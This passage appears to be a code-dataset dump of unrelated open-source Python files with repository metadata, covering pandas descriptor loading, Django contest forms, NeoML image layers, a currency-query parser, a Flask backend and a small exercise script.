output_df = csv_df_nums
# Adding back the index cols to the beginning
for each_col in default_index_cols[::-1]: # Reverse order
if each_col in csv_df and each_col not in output_df:
output_df.insert(0, each_col, csv_df[each_col])
except ValueError: # Happens when you have a blank dataframe
print("No columns found that matches filtration for %s"%(csv_path))
cols_to_include = [each_col for each_col in default_index_cols if each_col in csv_df.columns]
output_df = csv_df[cols_to_include]
# Storing dataframe
if output_filtered_data is True:
# Getting path without
csv_path_without_ext = os.path.splitext(csv_path)[0]
# Getting filtered nomenclature
csv_path_with_new_name = csv_path_without_ext + "_filtered.csv"
# Storing
print("Storing filtered data to: %s"%(csv_path_with_new_name))
output_df.to_csv(csv_path_with_new_name, index = False)
return output_df
else:
return csv_df
# Function to load multiple descriptor data sets
def load_multiple_descriptor_data(default_csv_paths,
descriptor_list = ["2d_descriptors",
"3d_descriptors",],
**args
):
"""
This function loads multiple descriptor data given a descriptor list.
Parameters
----------
default_csv_paths: dict
dictionary of csv paths
descriptor_list : list
list of descriptors to load from dictionary
Remainder of arguments go into the load descriptor function
Returns
-------
descriptor_df_dict: dict
dictionary containing descriptors
"""
# Loading all descriptor files
descriptor_df_dict = { each_descriptor_key: load_descriptor_data(default_csv_paths[each_descriptor_key], **args)
for each_descriptor_key in descriptor_list }
return descriptor_df_dict
# Function to strip title and etc to get numerical descriptors only
def strip_df_index(df,
col2remove = DEFAULT_INDEX_COLS):
"""
This function strips the dataframe from the index information.
Parameters
----------
df : dataframe
pandas dataframe containing descriptor information.
col2remove: list
list of columns to remove from the dataframe.
Returns
-------
df_clean: dataframe
pandas dataframe without any "Title" or index information
"""
# Dropping the columns
df_clean = df.drop(columns = col2remove,
errors='ignore')
return df_clean
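# Hypothetical usage of the loaders above (paths and dictionary keys are made up):
paths = {"2d_descriptors": "2d.csv", "3d_descriptors": "3d.csv"}
dfs = load_multiple_descriptor_data(paths, descriptor_list=["2d_descriptors"])
X = strip_df_index(dfs["2d_descriptors"])  # numeric matrix with index columns dropped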
| 33.545455
| 117
| 0.609907
| 805
| 6,642
| 4.823602
| 0.273292
| 0.019315
| 0.024723
| 0.011331
| 0.12104
| 0.058202
| 0.029874
| 0
| 0
| 0
| 0
| 0.005773
| 0.321891
| 6,642
| 198
| 118
| 33.545455
| 0.85635
| 0.448961
| 0
| 0.061538
| 0
| 0
| 0.096067
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.061538
| 0
| 0.215385
| 0.107692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee256a737518580b47e962df223472702fb695b6
| 6,013
|
py
|
Python
|
contest/forms.py
|
henryyang42/NTHUOJ_web
|
b197ef8555aaf90cba176eba61da5c919dab7af6
|
[
"MIT"
] | null | null | null |
contest/forms.py
|
henryyang42/NTHUOJ_web
|
b197ef8555aaf90cba176eba61da5c919dab7af6
|
[
"MIT"
] | null | null | null |
contest/forms.py
|
henryyang42/NTHUOJ_web
|
b197ef8555aaf90cba176eba61da5c919dab7af6
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import datetime
from django import forms
from django.views.generic.edit import UpdateView
from contest.models import Contest
from contest.models import Clarification
from contest.contest_info import get_freeze_time_datetime
from users.models import User
from datetimewidget.widgets import DateTimeWidget, DateWidget, TimeWidget
from problem.models import Problem
from django.db.models import Q
class ContestForm(forms.ModelForm):
dateTimeOptions = {
'format': 'yyyy-mm-dd hh:ii:00',
'todayBtn': 'true',
'minuteStep': 1,
}
start_time = forms.DateTimeField(
widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))
end_time = forms.DateTimeField(
widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))
def __init__(self, *args, **kwargs):
super(ContestForm, self).__init__(*args, **kwargs)
# access object through self.instance...
initial = kwargs.get('initial', {})
user = initial.get('user', User())
owner = initial.get('owner', User())
method = initial.get('method', '')
self.fields['coowner'].queryset = User.objects.exclude(
Q(user_level=User.USER) | Q(pk=owner))
if method == 'GET':
contest_id = initial.get('id', 0)
# non-admin users see only visible problems or their own;
# admins get the full problem list
if not user.has_admin_auth():
# edit contest
if contest_id:
contest = Contest.objects.get(pk=contest_id)
contest_problems = contest.problem.all().distinct()
self.fields['problem'].queryset = Problem.objects.filter(
Q(visible=True) | Q(owner=user)).distinct() | contest_problems
# create contest
else:
self.fields['problem'].queryset = Problem.objects.filter(
Q(visible=True) | Q(owner=user))
elif method == 'POST':
self.fields['problem'].queryset = Problem.objects.all()
class Meta:
model = Contest
fields = (
'cname',
'owner',
'coowner',
'start_time',
'end_time',
'freeze_time',
'problem',
'is_homework',
'open_register',
)
def clean_freeze_time(self):
start_time = self.cleaned_data.get("start_time")
freeze_time = self.cleaned_data.get("freeze_time")
end_time = self.cleaned_data.get("end_time")
if type(end_time) is datetime.datetime:
if end_time - datetime.timedelta(minutes=freeze_time) <= start_time:
raise forms.ValidationError(
"Freeze time cannot longer than Contest duration.")
return freeze_time
def clean_end_time(self):
start_time = self.cleaned_data.get("start_time")
end_time = self.cleaned_data.get("end_time")
if end_time <= start_time:
raise forms.ValidationError(
"End time cannot be earlier than start time.")
return end_time
class ClarificationForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ClarificationForm, self).__init__(*args, **kwargs)
# only problems the contest contains will be shown in the list
initial = kwargs.get('initial', {})
contest = initial.get('contest', {})
if type(contest) is Contest:
contest_id = contest.id
the_contest = Contest.objects.get(id=contest_id)
self.fields['problem'] = forms.ChoiceField(choices=[(problem.id, problem.pname)
for problem in the_contest.problem.all()])
class Meta:
model = Clarification
fields = (
'contest',
'problem',
'content',
'asker',
)
widgets = {
'content': forms.Textarea(),
}
class ReplyForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ReplyForm, self).__init__(*args, **kwargs)
# only problems the contest contains will be shown in the list
initial = kwargs.get('initial', {})
contest = initial.get('contest', {})
if type(contest) is Contest:
clarifications = Clarification.objects.filter(contest=contest)
self.fields['clarification'] = forms.ChoiceField(
choices=[(clarification.id, clarification.content)
for clarification in clarifications.all()])
class Meta:
model = Clarification
fields = (
'reply',
'replier',
'reply_time',
'reply_all'
)
widgets = {
'reply': forms.Textarea(),
}
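# Standalone sketch of the freeze-time rule enforced in clean_freeze_time above
# (my illustration, runnable without Django): a freeze window longer than the
# contest is rejected.
start = datetime.datetime(2015, 1, 1, 10, 0)
end = datetime.datetime(2015, 1, 1, 12, 0)
freeze_minutes = 150
assert end - datetime.timedelta(minutes=freeze_minutes) <= start  # -> would raise ValidationError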
| 38.793548
| 106
| 0.611342
| 671
| 6,013
| 5.362146
| 0.320417
| 0.023346
| 0.020845
| 0.026404
| 0.287104
| 0.280989
| 0.22179
| 0.22179
| 0.199555
| 0.199555
| 0
| 0.002356
| 0.29403
| 6,013
| 154
| 107
| 39.045455
| 0.84523
| 0.216697
| 0
| 0.285714
| 0
| 0
| 0.094723
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044643
| false
| 0
| 0.089286
| 0
| 0.232143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee27cbb1f5ab8ff62e70e97b161ec8429dba0d48
| 8,087
|
py
|
Python
|
NeoML/Python/neoml/Dnn/ImageConversion.py
|
ndrewl/neoml
|
c87361fa8489c28a672cb8e1a447f47ba4c1dbc5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
NeoML/Python/neoml/Dnn/ImageConversion.py
|
ndrewl/neoml
|
c87361fa8489c28a672cb8e1a447f47ba4c1dbc5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
NeoML/Python/neoml/Dnn/ImageConversion.py
|
ndrewl/neoml
|
c87361fa8489c28a672cb8e1a447f47ba4c1dbc5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Copyright (c) 2017-2020 ABBYY Production LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--------------------------------------------------------------------------------------------------------------*/
"""
import neoml.PythonWrapper as PythonWrapper
from .Dnn import Layer
from neoml.Utils import check_input_layers
class ImageResize(Layer):
"""The layer that resizes a set of two-dimensional multi-channel images.
Layer inputs
----------
#1: a set of images, of the dimensions:
- BatchLength * BatchWidth * ListSize - the number of images
- Height - the images' height
- Width - the images' width
- Depth * Channels - the number of channels the image format uses
Layer outputs
----------
#1: a blob with the resized images, of the dimensions:
- BatchLength, BatchWidth, ListSize, Depth, Channels are
equal to the input dimensions
- Height is the input Height plus the sum of top and bottom deltas
- Width is the input Width plus the sum of right and left deltas
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
deltas : ("left", "right", "top", "bottom")
The differences between the original and the resized image,
on each side. If the difference is negative, rows or columns are
removed from the specified side. If it is positive, rows or
columns are added and filled with the default_value pixels.
default_value : float, default=0.0
The value for the added pixels.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, deltas, default_value=0.0, name=None):
if type(input_layer) is PythonWrapper.ImageResize:
super().__init__(input_layer)
return
layers, outputs = check_input_layers(input_layer, 1)
if len(deltas) != 4:
raise ValueError('The `deltas` must contain 4 elements.')
internal = PythonWrapper.ImageResize(str(name), layers[0], int(outputs[0]), int(deltas[0]), int(deltas[1]), int(deltas[2]), int(deltas[3]), default_value)
super().__init__(internal)
@property
def deltas(self):
"""Gets the size differences on each side.
"""
return self._internal.get_deltas()
@deltas.setter
def deltas(self, deltas):
"""Sets the size differences on each side.
"""
if len(deltas) != 4:
raise ValueError('The `deltas` must contain 4 elements.')
self._internal.set_deltas(deltas)
@property
def default_value(self):
"""Gets the default value for new pixels.
"""
return self._internal.get_default_value()
@default_value.setter
def default_value(self, default_value):
"""Sets the default value for new pixels.
"""
self._internal.set_default_value(default_value)
# ----------------------------------------------------------------------------------------------------------------------
class PixelToImage(Layer):
"""The layer that creates a set of two-dimensional images using a set of
pixel sequences with specified coordinates.
Layer inputs
----------
#1: a blob with pixel sequences.
The dimensions:
- BatchLength is 1
- BatchWidth is the number of sequences in the set
- ListSize is the length of each sequence
- Height, Width, Depth are 1
- Channels is the number of channels for the pixel sequences
and the output images.
#2: a blob with integer data that contains lists of pixel coordinates.
The dimensions:
- BatchWidth, ListSize are the same as for the first input
- the other dimensions are 1
Layer outputs
----------
#1: a blob with images.
The dimensions:
- BatchLength is 1
- BatchWidth is the same as for the first input
- ListSize is 1
- Height is the specified image height
- Width is the specified image width
- Depth is 1
- Channels is the same as for the first input
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
height : int
The height of the resulting images.
width : int
The width of the resulting images.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, height, width, name=None):
if type(input_layer) is PythonWrapper.PixelToImage:
super().__init__(input_layer)
return
if height < 1:
raise ValueError('The `height` must be > 0.')
if width < 1:
raise ValueError('The `width` must be > 0.')
layers, outputs = check_input_layers(input_layer, 2)
internal = PythonWrapper.PixelToImage(str(name), layers[0], int(outputs[0]), layers[1], int(outputs[1]), int(height), int(width))
super().__init__(internal)
@property
def height(self):
"""Gets the output image height.
"""
return self._internal.get_height()
@height.setter
def height(self, height):
"""Sets the output image height.
"""
if height < 1:
raise ValueError('The `height` must be > 0.')
self._internal.set_height(height)
@property
def width(self):
"""Gets the output image width.
"""
return self._internal.get_width()
@width.setter
def width(self, width):
"""Sets the output image width.
"""
if width < 1:
raise ValueError('The `width` must be > 0.')
self._internal.set_width(width)
# ----------------------------------------------------------------------------------------------------------------------
class ImageToPixel(Layer):
"""The layer that extracts a set of pixel sequences along the specified
coordinates from a set of two-dimensional images.
Layer inputs
----------
#1: a set of two-dimensional images.
The blob dimensions:
- BatchLength is 1
- BatchWidth is the number of sequences in the set
- ListSize is 1
- Height is the images' height
- Width is the images' width
- Depth is 1
- Channels is the number of channels the image format uses
#2: a blob with integer data that contains the pixel sequences.
The dimensions:
- BatchWidth is the same as for the first input
- ListSize is the length of each sequence
- all other dimensions are 1
Layer outputs
----------
#1: a blob with the pixel sequences.
The dimensions:
- BatchLength is 1
- BatchWidth is the inputs' BatchWidth
- ListSize is the same as for the second input
- Height, Width, Depth are 1
- Channels is the same as for the first input
Parameters
----------
input_layer : (object, int)
The input layer and the number of its output. If no number
is specified, the first output will be connected.
name : str, default=None
The layer name.
"""
def __init__(self, input_layer, name=None):
if type(input_layer) is PythonWrapper.ImageToPixel:
super().__init__(input_layer)
return
layers, outputs = check_input_layers(input_layer, 2)
internal = PythonWrapper.ImageToPixel(str(name), layers[0], layers[1], int(outputs[0]), int(outputs[1]))
super().__init__(internal)
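# A hypothetical wiring example (the engine/source names follow my reading of
# the NeoML Python API and should be treated as an assumption): pad each image
# with a 2-pixel zero border using the ImageResize layer defined above.
import neoml

math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
data = neoml.Dnn.Source(dnn, 'data')
pad = ImageResize(data, deltas=(2, 2, 2, 2), default_value=0.0, name='pad2')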
| 33.143443
| 162
| 0.614319
| 1,028
| 8,087
| 4.749027
| 0.181907
| 0.018435
| 0.020279
| 0.014748
| 0.532773
| 0.481565
| 0.435887
| 0.364195
| 0.295371
| 0.295371
| 0
| 0.010853
| 0.259429
| 8,087
| 243
| 163
| 33.279835
| 0.804308
| 0.589836
| 0
| 0.428571
| 0
| 0
| 0.061385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.174603
| false
| 0
| 0.047619
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2a0ae02c4f7fec036fd44cc9fb937a9290c455
| 237
|
py
|
Python
|
test.py
|
Torxed/python-pyson
|
9bcbc256ec989832a0729fef06b797c9eceeaefa
|
[
"MIT"
] | 3
|
2020-11-03T03:40:53.000Z
|
2021-01-30T08:37:16.000Z
|
test.py
|
Torxed/python-pyson
|
9bcbc256ec989832a0729fef06b797c9eceeaefa
|
[
"MIT"
] | null | null | null |
test.py
|
Torxed/python-pyson
|
9bcbc256ec989832a0729fef06b797c9eceeaefa
|
[
"MIT"
] | null | null | null |
import time
import random
import pyson
content = """
{
"time" : time.time(),
random.randint(0, 1) : "a random number",
"another_level" : {
"test" : 5
},
"main level" : True
}
"""
print(pyson.loads(content, globals(), locals()))
| 13.941176
| 48
| 0.616034
| 30
| 237
| 4.833333
| 0.666667
| 0.110345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015544
| 0.185654
| 237
| 17
| 48
| 13.941176
| 0.735751
| 0
| 0
| 0
| 0
| 0
| 0.546218
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.214286
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2b80f6a26a0a00b8f295285fad069f948e9400
| 808
|
py
|
Python
|
output_generator/Output.py
|
selcukusta/codalyze-rest-api
|
2aebb7d96ea0d601af3f8dd0a995bc730621407a
|
[
"MIT"
] | 2
|
2020-11-16T15:53:08.000Z
|
2021-06-24T07:16:15.000Z
|
output_generator/Output.py
|
selcukusta/codalyze-rest-api
|
2aebb7d96ea0d601af3f8dd0a995bc730621407a
|
[
"MIT"
] | null | null | null |
output_generator/Output.py
|
selcukusta/codalyze-rest-api
|
2aebb7d96ea0d601af3f8dd0a995bc730621407a
|
[
"MIT"
] | 1
|
2021-11-25T11:57:57.000Z
|
2021-11-25T11:57:57.000Z
|
# -*- coding: utf-8 -*-
"""
This module extends the default output formatting to include HTML.
"""
import sys
import datetime
from jinja2 import Template
def html_output(source, header, thresholds):
source_file_dict = {"filename": source.filename}
func_list = []
for source_function in source.function_list:
if source_function:
source_function_dict = source_function.__dict__
func_list.append(source_function_dict)
source_file_dict["functions"] = func_list
with open("./assets/report.html") as f:
output = Template(f.read()).render(
header=header,
date=datetime.datetime.now().strftime("%Y-%m-%d %H:%M"),
thresholds=thresholds,
argument=source_file_dict,
)
return output
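# Hypothetical smoke test (my addition): html_output only reads `filename` and
# `function_list` from the source object, so a SimpleNamespace stands in here.
# It still requires the bundled ./assets/report.html template on disk.
from types import SimpleNamespace

fake_fn = SimpleNamespace(name='main', complexity=3)
fake_src = SimpleNamespace(filename='demo.py', function_list=[fake_fn])
print(html_output(fake_src, header='Demo report', thresholds={'complexity': 10}))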
| 27.862069
| 68
| 0.643564
| 95
| 808
| 5.242105
| 0.536842
| 0.168675
| 0.084337
| 0.096386
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003295
| 0.248762
| 808
| 28
| 69
| 28.857143
| 0.817133
| 0.110149
| 0
| 0
| 0
| 0
| 0.07173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2cb32d9eb1f15b26b978d44b78859a10f8c8d9
| 5,733
|
py
|
Python
|
currnlp - deprecated.py
|
Elbitty/Elbitty
|
fafc1623ca002a6e499101b513696fecf1e894d1
|
[
"MIT"
] | null | null | null |
currnlp - deprecated.py
|
Elbitty/Elbitty
|
fafc1623ca002a6e499101b513696fecf1e894d1
|
[
"MIT"
] | 3
|
2017-07-03T04:01:29.000Z
|
2017-07-04T00:22:54.000Z
|
currnlp - deprecated.py
|
Elbitty/Elbitty
|
fafc1623ca002a6e499101b513696fecf1e894d1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import NLP
def calculate(tags):
tmp_str = " ".join(str(val) for val in tags)
tmp_tags = NLP.calculate_also_pos(tmp_str)
print(tmp_tags)
lst_query = ["USD", "KRW"]#기본 원달러 환율로 초기화
str_humanize = ["달러", "원"]#기본 원달러 환율로 초기화
indicator = 0
cursor = 0
value_of_currency = 1
multiplier = 1
for idx, val in enumerate(tmp_tags):
if val[1] == "Number":
if (idx - cursor) < 2:
value_of_currency = float(val[0])
if (idx - cursor) < 3:
if val[0] == "십":
multiplier = 10
cursor = idx
if val[0] == "백":
multiplier = 100
cursor = idx
if val[0] == "천":
multiplier = 1000
cursor = idx
if val[0] == "만":
multiplier = 10000
cursor = idx
if val[0] == "십만":
multiplier = 100000
cursor = idx
if val[0] == "백만":
multiplier = 1000000
cursor = idx
if val[0] == "천만":
multiplier = 10000000
cursor = idx
if val[0] == "억":
multiplier = 100000000
cursor = idx
if val[0] == "십억":
multiplier = 1000000000
cursor = idx
if (val[0] == "원") or (val[0] == "원화") or (val[0] == "KRW"):
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
indicator += 1
elif val[0] == "십원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10
indicator += 1
elif val[0] == "백원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100
indicator += 1
elif val[0] == "천원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 1000
indicator += 1
elif val[0] == "만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10000
indicator += 1
elif val[0] == "십만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100000
indicator += 1
elif val[0] == "백만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 1000000
indicator += 1
elif val[0] == "천만원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 10000000
indicator += 1
elif val[0] == "억원":
str_humanize[indicator] = "원"
lst_query[indicator] = "KRW"
cursor = idx
multiplier = 100000000
indicator += 1
elif (val[0] == "달러") or (val[0] == "달러화"):
str_humanize[indicator] = "달러"
lst_query[indicator] = "USD"
cursor = idx
indicator += 1
elif (val[0] == "엔") or (val[0] == "엔화") or (val[0] == "JPY"):
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
indicator += 1
elif val[0] == "십엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10
indicator += 1
elif val[0] == "백엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 100
indicator += 1
elif val[0] == "천엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 1000
indicator += 1
elif val[0] == "만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10000
indicator += 1
elif val[0] == "십만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 100000
indicator += 1
elif val[0] == "백만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 1000000
indicator += 1
elif val[0] == "천만엔":
str_humanize[indicator] = "엔"
lst_query[indicator] = "JPY"
cursor = idx
multiplier = 10000000
indicator += 1
elif (val[0] == "유로") or (val[0] == "유로화") or (val[0] == "EUR"):
str_humanize[indicator] = "유로"
lst_query[indicator] = "EUR"
cursor = idx
indicator += 1
elif (val[0] == "위안") or (val[0] == "위안화") or (val[0] == "CNY"):
str_humanize[indicator] = "위안"
lst_query[indicator] = "CNY"
cursor = idx
indicator += 1
to_measure = int(value_of_currency * multiplier)
if (to_measure == 1) and (not indicator <= 1):
str_humanize.reverse()
str_query = lst_query[1] + lst_query[0]
else:
str_query = lst_query[0] + lst_query[1]
return str_query, to_measure, str_humanize
if __name__ == "__main__":
print(calculate(['50', '만엔', '얼마']))
| 30.822581
| 72
| 0.451073
| 591
| 5,733
| 4.248731
| 0.177665
| 0.062127
| 0.159299
| 0.128634
| 0.623258
| 0.562326
| 0.562326
| 0.526483
| 0.526483
| 0.398248
| 0
| 0.063164
| 0.425606
| 5,733
| 185
| 73
| 30.989189
| 0.699362
| 0.012036
| 0
| 0.634731
| 0
| 0
| 0.034452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005988
| false
| 0
| 0.005988
| 0
| 0.017964
| 0.011976
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2dc666a79347b77adfd1d774a2855491600019
| 1,617
|
py
|
Python
|
__main__.py
|
tinyurl-com-ItsBigBrainTimeXD/backend
|
4d360ed02aa5475279af03e4f4300dde6ccc3391
|
[
"MIT"
] | null | null | null |
__main__.py
|
tinyurl-com-ItsBigBrainTimeXD/backend
|
4d360ed02aa5475279af03e4f4300dde6ccc3391
|
[
"MIT"
] | null | null | null |
__main__.py
|
tinyurl-com-ItsBigBrainTimeXD/backend
|
4d360ed02aa5475279af03e4f4300dde6ccc3391
|
[
"MIT"
] | null | null | null |
from multiprocessing import Lock
from flask import Flask, request, jsonify
from constants import HOST, PORT
from Database.database import Database
from handler.frontendHandler import frontend_handler
from handler.iotHandler import iot_handler
# Create the flask application
app = Flask(__name__)
db_name = 'test.db'
db_lock = Lock()
# Create a basic route for debugging
@app.route('/')
def index():
"""The homepage for the api
This is for debugging purposes
"""
return '<h1>Hello world</h1>'
# REST for frontend
@app.route('/frontend/<query>', methods=['GET'])
def front_end_get(query):
"""Get data"""
# Get the body and the request type
if not query.isdigit():
return 'Not found', 404  # a bare int is not a valid Flask response
req_body = {'type': int(query)}
req_type = request.method
req_body.update(request.args)
db_lock.acquire(True)
db = Database(db_name)
result = frontend_handler(req_body, req_type, db)
del db
db_lock.release()
return jsonify(result)
@app.route('/frontend', methods=['POST', 'PUT', 'DELETE'])
def frontend():
"""The endpoint for the frontend application to interact with"""
# Get the body and the request type
req_body = request.get_json()
req_type = request.method
db_lock.acquire(True)
db = Database(db_name)
result = frontend_handler(req_body, req_type, db)
del db
db_lock.release()
return jsonify(result)
@app.route('/device', methods = ['GET'])
def iot_get():
req_type = request.method.lower()
result = iot_handler(req_type)
return jsonify(result)
if __name__ == "__main__":
app.run(HOST, PORT)
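# Example requests against the routes above (HOST/PORT come from constants.py,
# which is not shown; localhost:5000 and the 'limit' query parameter below are
# assumptions for illustration):
#   curl http://localhost:5000/
#   curl 'http://localhost:5000/frontend/1?limit=10'
#   curl -X POST -H 'Content-Type: application/json' \
#        -d '{"type": 1}' http://localhost:5000/frontend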
| 25.265625
| 68
| 0.685838
| 224
| 1,617
| 4.772321
| 0.334821
| 0.039289
| 0.022451
| 0.056127
| 0.265669
| 0.265669
| 0.265669
| 0.215154
| 0.215154
| 0.215154
| 0
| 0.003855
| 0.197897
| 1,617
| 63
| 69
| 25.666667
| 0.820355
| 0.16945
| 0
| 0.357143
| 0
| 0
| 0.070229
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.142857
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee2fea5e9be5798ddc9725b7766369f326b358d6
| 452
|
py
|
Python
|
ex055.py
|
LucasLCarreira/Python
|
03bd64837d74315687e567261a149f0176496348
|
[
"MIT"
] | 1
|
2020-04-21T19:14:50.000Z
|
2020-04-21T19:14:50.000Z
|
ex055.py
|
LucasLCarreira/Python
|
03bd64837d74315687e567261a149f0176496348
|
[
"MIT"
] | null | null | null |
ex055.py
|
LucasLCarreira/Python
|
03bd64837d74315687e567261a149f0176496348
|
[
"MIT"
] | null | null | null |
# Python Exercise 055
# Read the weight of 5 people and show the heaviest and the lightest
maior = 0
menor = 0
for p in range(1, 6):
peso = int(input("Digite o peso:"))
if p == 1: #com o contador na primeira posição, o maior e o menor são iguais
maior = peso
menor = peso
else:
if peso > maior:
maior = peso  # was 'maior = p', which stored the loop index by mistake
if peso < menor:
menor = peso  # same fix as above
print("O maior valor é:", maior)
print("O menor valor é:", menor)
| 25.111111
| 80
| 0.573009
| 74
| 452
| 3.5
| 0.472973
| 0.069498
| 0.054054
| 0.061776
| 0.100386
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029801
| 0.331858
| 452
| 17
| 81
| 26.588235
| 0.827815
| 0.298673
| 0
| 0
| 0
| 0
| 0.146965
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee30562de746fae8c4e7f911bc276f4521628762
| 886
|
py
|
Python
|
1 - companies_list_downloader.py
|
B-Jugurtha/Project-01--Web-scraping---Data-cleaning
|
